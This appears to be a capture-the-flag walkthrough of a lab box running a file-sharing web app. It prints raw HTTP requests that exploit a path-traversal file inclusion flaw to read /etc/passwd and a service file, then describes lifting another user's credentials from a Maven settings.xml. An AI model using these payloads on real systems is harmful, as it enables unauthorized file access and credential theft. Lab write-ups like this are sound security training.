The website itself is described as Zodd Cloud which is a place to store, share and collaborate on files and folders.
There's not much to the page itself, the registration is disabled and the login button is a dead end.
But there's and upload button wich will take you to a page where you are able to upload files.
Foothold
Exploitation
Upload: LFI & Directory Listing
As always I let Burp run in the background and browse the page, click on everything and check what I got in Burp.
After uploading an image I already noticed the URL which looked like a typical target for a LFI.
URL: /show_image?img=cat.png
And as I thought I was able to verify it's vulnerable to LFI and even lists directories!
But you would have to either use curl or Burp to see the results as the Webapp tries to display the response as Image.
Display: /etc/passwd
GET /show_image?img=../../../../../../etc/passwd HTTP/1.1Host:10.129.54.43:8080User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateConnection:closeUpgrade-Insecure-Requests:1token:ddac62a28254561001277727cb397baf
GET /show_image?img=../../../../../../../etc/systemd/system/webapp.service HTTP/1.1Host:10.129.54.43:8080User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateConnection:closeUpgrade-Insecure-Requests:1token:ddac62a28254561001277727cb397baf
While looking around I discovered a folder called .m2 in franks home directory. That folder contained a settings.xml which included credentials for the user account of phil.
su-phil
Flag
The flag is located in /home/phil
Escalation
Local Enumeration
User Phil is member of the group staff which could be interesting.